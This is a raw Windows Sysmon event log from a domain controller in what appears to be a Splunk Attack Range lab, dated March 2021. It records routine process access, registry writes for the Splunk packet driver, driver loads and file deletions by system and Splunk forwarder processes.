12:03:02.020{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.984{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.906{266CAFBE-646A-6064-0A00-00000000AE01}8401248C:\Windows\system32\services.exe{266CAFBE-64F7-6064-0801-00000000AE01}4280C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.906{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64F7-6064-0801-00000000AE01}4280C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.844{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64F7-6064-0801-00000000AE01}4280C:\Windows\system32\sppsvc.exe0x103800C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.844{266CAFBE-646A-6064-0A00-00000000AE01}840900C:\Windows\system32\services.exe{266CAFBE-64F7-6064-0801-00000000AE01}4280C:\Windows\system32\sppsvc.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+1643d|C:\Windows\SYSTEM32\ntdll.dll+7f3fd|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.766{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.766{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.766{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.641{266CAFBE-64F5-6064-0301-00000000AE01}65005408C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe+2016cb|C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe+a6e213|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 644600x80000000000000008565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.641C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sysMD5=DE7FCC77F4A503AF4CA6A47D49B3713D,SHA256=4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6,IMPHASH=CB86059F4B291991E735BECBD4C669CBtrueRiverbed Technology, Inc.Valid 10341000x80000000000000008564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.641{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64F6-6064-0501-00000000AE01}4136C:\Windows\System32\msdtc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.641{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64F6-6064-0501-00000000AE01}4136C:\Windows\System32\msdtc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000008562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:03.641{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\PACKETDRIVER\NdisMinorVersionDWORD (0x00000000) 13241300x80000000000000008561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:03.641{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\PACKETDRIVER\NdisMajorVersionDWORD (0x00000005) 13241300x80000000000000008560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:03.641{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\npf\TimestampModeDWORD (0x00000000) 13241300x80000000000000008559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:03.625{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\DisplayNamenpf 13241300x80000000000000008558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:03:03.625{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\ImagePath\??\C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sys 13241300x80000000000000008557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:03.625{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\ErrorControlDWORD (0x00000001) 13241300x80000000000000008556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:03:03.625{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\StartDWORD (0x00000003) 13241300x80000000000000008555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:03.625{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\TypeDWORD (0x00000001) 10341000x80000000000000008554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.438{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F7-6064-0701-00000000AE01}6380C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.438{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.438{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.438{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.438{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.438{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64F7-6064-0701-00000000AE01}6380C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.438{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F7-6064-0701-00000000AE01}6380C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.299{266CAFBE-64F7-6064-0701-00000000AE01}6380C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000008609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.950{266CAFBE-64F7-6064-0801-00000000AE01}4280NT AUTHORITY\NETWORK SERVICEC:\Windows\system32\sppsvc.exeC:\Windows\System32\spp\store\2.0\tokens.dat.bakMD5=7804EB07B57051D39217276E90528A99,SHA256=0FB12DF4C704C9CEC3ED2169ACCF125B56D782C2582276163C8435FC0402FFB2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.810{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000008607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.742{266CAFBE-64F5-6064-0301-00000000AE01}6500win-dc-8920fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe 23542300x80000000000000008606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.717{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\{0BDE7B0F-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.dbMD5=F3DC4461F59519C68ABD86B979EA9762,SHA256=5896967D61C1C716C98511DCFC267A12749D330E5DEB35ECCB4690DFA756C964,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.654{266CAFBE-646C-6064-1300-00000000AE01}1228NT AUTHORITY\SYSTEMC:\Windows\System32\svchost.exeC:\Windows\Temp\UDD4859.tmpMD5=DE7FCC77F4A503AF4CA6A47D49B3713D,SHA256=4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6,IMPHASH=CB86059F4B291991E735BECBD4C669CBtruetrue 23542300x80000000000000008604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.654{266CAFBE-646C-6064-1300-00000000AE01}1228NT AUTHORITY\SYSTEMC:\Windows\System32\svchost.exeC:\Windows\Temp\UDD4859.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000008603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.623{266CAFBE-64F7-6064-0801-00000000AE01}4280C:\Windows\system32\sppsvc.exeC:\Windows\System32\spp\store\2.0\tokens.dat2016-09-12 11:33:54.265 10341000x80000000000000008602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.420{266CAFBE-64F8-6064-0901-00000000AE01}53206108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000008601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.342{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\1033\StructuredQuerySchema.binMD5=E871053170AD09568882637D049295DC,SHA256=CEA9EABB0B46AC602CDC3FB6FE6215981F2D7C0C6A5C5023CE72860232DBE12B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 